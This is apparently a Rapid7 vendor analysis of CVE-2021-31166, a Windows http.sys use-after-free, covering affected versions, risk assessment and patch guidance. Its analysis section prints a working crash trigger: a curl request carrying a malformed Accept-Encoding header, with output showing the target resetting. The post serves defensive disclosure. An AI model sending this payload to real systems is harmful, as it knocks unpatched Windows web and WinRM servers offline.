Rapid7
Back to Blog
Threat Research

Rapid7 Analysis: CVE-2021-31166

Rapid7 Labs
Rapid7 Labs
|Last updated on Jun 16, 2026|3 min read

Description

On Tuesday, May 11, 2021, as part of their May Patch Tuesday advisory release, Microsoft published information on CVE-2021-31166, a high-severity remote code execution vulnerability in the Windows HTTP protocol stack. Successful exploitation requires a remote, unauthenticated attacker to send a specially crafted packet to a target server that uses the HTTP Protocol Stack (http.sys) to process packets. Microsoft noted in their advisory that the vulnerability, which carries a CVSSv3 base score of 9.8, has the potential to be wormed (as many protocol vulnerabilities have potential to be).

Public proof-of-concept (PoC) exploit code that crashes a vulnerable target (but does not achieve remote code execution) has been available since May 16, 2021.

Affected products

Early information indicated that only the most recent versions of Windows were vulnerable and primarily affected web server implementations of http.sys. On Friday, May 21, 2021, however, security community members noted that Windows Remote Management, or WinRM, is also vulnerable due to its use of the http.sys driver. On Saturday, May 22, 2021, Windows 10 21H1 was also reported as being vulnerable. Later in the day, it was further noted that any servers running with the Microsoft-HTTPAPI/2.0 header may be vulnerable.

  • Windows 10 Version 21H1
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64-based Systems
  • Windows 10 Version 20H2 for 32-bit Systems
  • Windows 10 Version 20H2 for x64-based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64-based Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems

Rapid7 analysis

CVE-2021-31166 is a use-after-free (memory corruption) vulnerability whose exploitation requires manipulation of kernel memory. The realization that more Windows 10 implementations beyond IIS are vulnerable raises the alarm level slightly given the expanded attack surface area; however, reliable weaponization of CVE-2021-31166 for code execution is non-trivial, and exploitation for code execution is unlikely to occur quickly (and even less likely to occur quickly at scale). With that said, the risk is worth taking seriously for those running on more recent Windows update streams: The time between vulnerability disclosure and reliable attacks has decreased significantly over the past year, and defenders are detecting a comparatively high proportion of attacks perpetrated by sophisticated adversaries.

Rapid7 researchers were able to reproduce a crash against a Windows 10 target configured as a web server and as a WinRM-enabled host (shown below).

wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,
>
< HTTP/1.1 404 Not Found
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Fri, 21 May 2021 20:48:16 GMT
< Connection: close
< Content-Length: 315
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Not Found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Not Found</h2>
<hr><p>HTTP Error 404. The requested resource is not found.</p>
</BODY></HTML>
* Closing connection 0
wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,,
>
* Recv failure: Connection reset by peer
* Closing connection 0
curl: (56) Recv failure: Connection reset by peer
wvu@kharak:~$

When a malformed Accept-Encoding header is sent in the request, the target immediately crashes, and the connection is reset.

Guidance

KB5003173 provides guidance on patching CVE-2021-31166. Patches may be downloaded directly from the Microsoft Update Catalog.

References

  • https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
  • https://twitter.com/0vercl0k/status/1393970836302811138
LinkedInFacebookXBluesky

Article Tags

Rapid7 Labs
Rapid7 Labs
Author Posts